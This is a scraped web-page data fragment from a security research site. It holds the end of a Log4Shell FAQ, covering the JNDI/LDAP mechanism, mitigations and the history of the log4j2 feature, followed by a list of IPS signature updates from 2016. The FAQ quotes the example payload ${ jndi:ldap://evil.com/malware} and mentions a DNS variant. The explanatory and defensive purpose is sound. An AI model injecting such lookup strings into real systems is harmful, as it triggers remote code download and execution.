\n\n\n\n\n

 

\n\n\n\n

How does an exploit for Log4Shell work exactly? What do “jndi” and “ldap” mean?

\n\n\n\n

JNDI is a Java feature which allows Java objects to be loaded and used by a Java program during runtime. One of JNDI’s supported protocols for incoming Java objects is LDAP, an open-source, vendor-neutral protocol for “accessing directory information”, which you can also use to speak to your friendly neighborhood installation of MS Active Directory. LDAP and its Data Interchange Format (LDIF) were created at the University of Michigan in 1992, and if you squint at them enough, they almost look like some sort of proto-nosql.

\n\n\n\n

The log4j2 module’s homebrew “lookups” language supports retrieveing objects via JNDI. The string ${ jndi:ldap://evil.com/malware} means: “please use JNDI to retrieve and run the Java class residing at evil.com/malware; you will receive the class in LDAP protocol response format”. It should be noted that while only the ${ jndi:ldap://...} attack variant has become a proper viral meme, there are milder variants of the attack such as e.g.  ${ jndi:dns://...} which will make a crafted DNS request to a server of the attacker’s choice, and can be used to cause unauthorized information disclosure.

\n\n\n\n

As part of their response guide, the Swiss CERT produced a visualization of the attack which we find very elucidating, and is reproduced below.

\n\n\n\n

\n\n\n\n

 

\n\n\n\n

How can I protect myself against Log4Shell?

\n\n\n\n

First, we encourage you to browse the above-mentioned Swiss CERT response guide in its entirety, including the list of recommended actions. Second, you should appreciate that these many and varied countermeasures are all presented for a reason, and no single one of them is a silver bullet. To wit:

\n\n\n\n\n\n\n\n

Each individual mitigation on the list has its holes and drawbacks, but jointly, these items constitute something like the swiss cheese model of pandemic defense. 

\n\n\n\n

How and Why did this happen? How do we make sure it doesn’t happen again?

\n\n\n\n

The story goes more or less like this.

\n\n\n\n

In March of 1999, 8 developers working on the Apache web server form the Apache Software Foundation (ASF), a nonprofit with the goal of supporting open source projects. Under the guidance of the ASF, the original log4j sees its alpha release about half a year later, and a stable release follows about a year after that, in early 2001. Development on the original log4j continues until 2005 or so; in 2006, a new project named “LogBack” appears, introducing itself as a “successor [..] which picks up where log4j 1.X left off” and offering various performance and quality of life improvements. In 2012, log4j experiences an unlikely renaissance, as several developers come together to create a rewrite of it which becomes the initial alpha version of log4j2. Two months later, log4j2 publishes a beta release; it is during this beta phase that one of the project early adopters creates a feature request for support of JNDI as a very convenient feature, detailing several use cases for it and even offering an already-written patch containing an implementation. 5 days after the request is submitted, a project maintainer laconically approves the merge request: “Your patch was committed in revision 1504620. Please verify and close”.

\n\n\n\n

8 years later, which is to say, last month, the Alibaba cloud security team discreetly reaches out to the ASF in order to disclose the existence of the log4shell vulnerability. Public disclosure follows a few weeks later in a tweet (that has since been deleted), including source code for a working exploit. All hell breaks loose and the xkcd comic below is posted to social media thirty thousand times. 

\n\n\n\n
\"\"/
\n\n\n\n

Patches are issued, JVMs are updated, incident response teams over the world contemplate a career of cabbage farming someplace quiet in Canada. One of the log4j2 project maintainers complains:

\n\n\n\n
\n

Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. https://t.co/W2u6AcBUM8

— Volkan Yazıcı (@yazicivo) December 10, 2021
\n
\n\n\n\n

Response is overwhelmingly supportive. The occasional dissenter insists that there was no “need” to keep anything and “compatibility” is the root of all evil, or at least in this case, in hindsight, it was. Passers-by wonder if the ASF hasn’t been paying the maintainers of log4j2, what has it been doing exactly.

\n\n\n\n

Natural human instinct is to blame someone, and maybe for good reason. A lot of problems in the world are in fact the fault of specific people being selfish or short-sighted, and can be solved by taking these people to task. Still, it’s worth remembering that a lot of other problems in the world are caused by impersonal forces that push around individuals like cogs in a machine, seemingly without regard for their theoretical free will. How many times in history has a developer, even a well-paid developer, approved a feature request like this, despite a tingling sense of unease that the feature seems too powerful and vaguely out of scope for the project? The first security professional, tasked with securing a cave some time in the stone age, probably complained about this on their first day. It seems to keep happening no matter how many times we point the blaming finger at people after the fact. No one is very excited to deal with angry users, colleagues, managers and have to explain to them “no, everyone, trust me, I prevented a catastrophe”.

\n\n\n\n

The emergence of the OpenSSL Heartbleed vulnerability in 2014 kindled a keen interest in taking better care of starved and understaffed open source projects that are cornerstones of modern digital infrastructure, as visualized in the comic above. Surely, this even worse incident will have a similar effect. But maybe the most profound effect of this whole ordeal on the future will be its weight as a cautionary tale. Three weeks ago, the average developer faced with a demand to have software evaluate arbitrary expressions for an extra “convenient” feature would have been the helpless cog in the machine, pressured to comply, with no recourse but to issue vague theoretical warnings that this is not the Right Thing To Do. But from today on, that developer can and should respond: “No. Are you serious? Do you want to cause the next Log4Shell?”

\n\n\n\n

 

\n\n\n\n

 

\n","status":"PUBLISHED","fileName":null,"link":"https://research.checkpoint.com/2021/the-laconic-log4shell-faq/","tags":[],"score":0.028143517673015594,"topStoryDate":null},{"id":"1161","type":"Release_Letters","name":"Check Point IPS Security Update August 22, 2016","author":"IPS Team","date":1471849200000,"description":"Check Point IPS Security Update\nAugust 22nd, 2016 - Package No. 634165624","content":"

Check Point IPS Security Update

\"\"/


Check Point  IPS Security Update
August 22nd, 2016 - Package No. 634165624
 
Recommended Profile Updates  

ADDED PROTECTIONS
Fortinet Cookie Overflow Remote Code Execution (EGREGIOUSBLUNDER)  NEW!
Check Point Reference  CPAI-2016-0715
An overflow vulnerability exists in authentication cookie on Fortinet firewalls.
This protection detects attempts to exploit this vulnerability.
 
Adobe Acrobat and Reader Security Bypass (APSB16-14; CVE-2016-1040)  NEW!
Industry Reference  CVE-2016-1040  | Check Point Reference  CPAI-2016-0694
A remote code execution vulnerability exists in Adobe Acrobat and Reader.
This protection detects attempts to exploit this vulnerability.
 
Apache Commons FileUpload Denial Of Service (CVE-2016-3092)  NEW!
Industry Reference  CVE-2016-3092  | Check Point Reference  CPAI-2016-0684
A denial of service vulnerability exists in Apache Commons FileUpload.
This protection detects attempts to exploit this vulnerability.
 
Centreon Web Useralias Remote Command Execution  NEW!
Check Point Reference  CPAI-2016-0688
A Remote command execution vulnerability exists in Centreon Web Interface.
This protection detects attempts to exploit this vulnerability.
 
Command Injection Over Telnet  NEW!
Check Point Reference  CPAI-2016-0698
Telnet is an internet protocol that provides access to remote computers using a virtual terminal.
This protection detects attempts to exploit this vulnerability.
 
Drupal CODER Module Remote Code Execution  NEW!
Check Point Reference  CPAI-2016-0709
A code execution vulnerability exists in Drupal CODER Module.
This protection detects attempts to exploit this vulnerability.
 
Drupal RESTWS Remote Code Execution  NEW!
Check Point Reference  CPAI-2016-0651
A code execution vulnerability exists in Drupal RESTful Web Services (RESTWS) Module.
This protection detects attempts to exploit this vulnerability.
 
Generic DVR Default Credentials Login Attempt  NEW!
Check Point Reference  CPAI-2016-0689
An attacker may attempt to gain access to the system by trying to log in using the default passwords, eventually finding the correct one.
This protection detects attempts to exploit this vulnerability.
 
JexBoss Security Scanner  NEW!
Check Point Reference  CPAI-2016-0710
JexBoss is a vulnerability scanning product.
This protection detects attempts to exploit this vulnerability.
 
Rockwell Automation MicroLogix Remote Code Execution (CVE-2016-5645)  NEW!
Industry Reference  CVE-2016-5645  | Check Point Reference  CPAI-2016-0714
A vulnerability exists in the SNMP functionality on Rockwell Automation PLC systems.
This protection detects attempts to exploit this vulnerability.
 
SUN-RPC Programs Lookup - ver 2  NEW!
Check Point Reference  CPAI-2016-0563
SUN-RPC has a scanning interface.
This protection detects attempts to exploit this vulnerability.
 
Schneider Electric GP-Pro EX ParseAPI Heap Buffer Overflow  NEW!
Check Point Reference  CPAI-2016-0513
A heap buffer overflow vulnerability exists in Schneider Electric GP-Pro EX.
This protection will detect and block attempts to exploit this vulnerability.
 
SolarWinds SRM Profiler RulesMetaData addNewRule SQL Injection  NEW!
Check Point Reference  CPAI-2016-0697
An SQL injection vulnerability exists in the SolarWinds Storage Manager Resource Monitor, Profiler Module.
This protection will detect and block attempts to exploit this vulnerability.
 
Solarwinds Virtualization Manager Apache Commons Collections Insecure Deserialization (CVE-2016-3642)  NEW!
Industry Reference  CVE-2016-3642  | Check Point Reference  CPAI-2016-0695
An insecure deserialization vulnerability has been reported in Solarwinds Virtualization Manager.
This protection will detect and block attempts to exploit this vulnerability.
 
Symantec Endpoint Protection Manager Cross Site Request Forgery (CVE-2016-3653)  NEW!
Industry Reference  CVE-2016-3653  | Check Point Reference  CPAI-2016-0702
A Cross Site Request Forgery vulnerability has been reported in the Symantec Endpoint Protection Manager.
This protection will detect and block attempts to exploit this vulnerability.
 
Symantec Endpoint Protection Manager Cross-Site Scripting (CVE-2016-3652)  NEW!
Industry Reference  CVE-2016-3652  | Check Point Reference  CPAI-2016-0706
A cross-site-scripting vulnerability has been reported in the Symantec Endpoint Protection Manager.
This protection will detect and block attempts to exploit this vulnerability.
 
Symantec Endpoint Protection Manager Open Redirect Report-Routing Component (CVE-2016-5304)  NEW!
Industry Reference  CVE-2016-5304  | Check Point Reference  CPAI-2016-0707
Open redirect vulnerability in a report-routing component in Symantec Endpoint Protection Manager (SEPM) 12.
This protection detects attempts to exploit this vulnerability.
 
WECON LeviStudio String Content Heap Buffer Overflow  NEW!
Check Point Reference  CPAI-2016-0705
The vulnerability is due to improper parsing of XML String Content attribute of LeviStudio project files.
This protection will detect and block attempts to exploit this vulnerability.
 
WordPress All In One WP Security and Firewall Plugin Login CAPTCHA Bypass  NEW!
Check Point Reference  CPAI-2016-0687
The login CAPTCHA provided by the WordPress All In One WP Security and Firewall Plugin can be circumvented, allowing attackers to automate login attempts when the CAPTCHA is enabled.
This protection detects attempts to exploit this vulnerability.
 
WordPress Core Authenticated Cross-Site Scripting (CVE-2016-1564)  NEW!
Industry Reference  CVE-2016-1564  | Check Point Reference  CPAI-2016-0650
A cross-site scripting vulnerability exists in WordPress core.
This protection detects attempts to exploit this vulnerability.
 
WordPress Ninja Forms Plugin SQL Injection  NEW!
Check Point Reference  CPAI-2016-0711
An SQL injection vulnerability exists in the WordPress Ninja Forms Plugin.
This protection detects attempts to exploit this vulnerability.
 
Microsoft LDAP Remote Anonymous Denial of Service (MS13-079; CVE-2013-3868)
Industry Reference  CVE-2013-3868  | Check Point Reference  CPAI-2013-2912
A denial of service vulnerability exists in implementations of Active Directory that could cause the service to stop responding.
This protection will detect and block a brute force attempt on Microsoft LDAP server.
 
UPDATED PROTECTIONS
CPAI-2011-109 IBM Lotus Notes LZH Attachment Viewer Stack Buffer Overflow (CVE-2011-1213)
SBP-2009-15  Invalid IIS ASP.Net URI Character Request (CVE-2009-1536)
CPAI-2016-0670 Microsoft Edge Use After Free (MS16-095; CVE-2016-3326)
CPAI-2016-0679 Microsoft Graphics Component Memory Corruption (MS16-099; CVE-2016-3318)
CPAI-2012-129  Microsoft MSCOMCTL.OCX ActiveX Control Remote Code Execution (MS12-027; CVE-2012-0158)
CPAI-2016-0427 Microsoft Office Information Disclosure (MS16-070; CVE-2016-3234)
CPAI-2006-105 Microsoft Office RTF Malicious Known Variables
CPAI-2010-309 Microsoft Office RTF Stack Buffer Overflow (MS10-087; CVE-2010-3333)
CPAI-2016-0077 Microsoft Windows DLL Loading Remote Code Execution (MS16-014; CVE-2016-0041)
CPAI-2016-0303 Microsoft Windows Graphics Component Information Disclosure (MS16-055; CVE-2016-0168)
CPAI-2016-0153 Microsoft Windows PDF Library Remote Code Execution (MS16-028; CVE-2016-0117)
SBP-2011-05  Multiple SSH Initial Connection Requests
CPAI-2013-007 Oracle Java JmxMBeanServer Package Sandbox Breach (CVE-2013-0422)
CPAI-2016-0515 PayPal Mail Phishing Containing Attachment
CPAI-2007-127 Sun Java Web Start dnsResolve ActiveX Buffer Overflow (CVE-2007-5019)
CPAI-2014-2206 Web Servers Suspicious File Upload
 
 
Other Updates  
 
NEW PROTECTIONS
Weak Password Login Attempt Over Telnet
Check Point Reference  CPAI-2016-0704
Telnet is an internet protocol that provides access to remote computers using a virtual terminal.
This protection detects attempts to login to telnet service with a weak password.
 
 
UPDATED PROTECTIONS
SBP-2011-03  Brute Force Scanning of CIFS Ports
SBP-2010-17  Microsoft Windows ISATAP IPv6 Source Address Spoofing (CVE-2010-0812)
CPAI-2012-809 SCADA ICONICS WebHMI ActiveX Stack Overflow (CVE-2011-2089)
CPAI-2014-1191 Web Servers Slow HTTP Denial of Service
 
","status":"PUBLISHED","fileName":"1010","link":null,"tags":["IPS"],"score":0.011045686900615692,"topStoryDate":null}],"mapData":null,"topMalwareFamilies":null};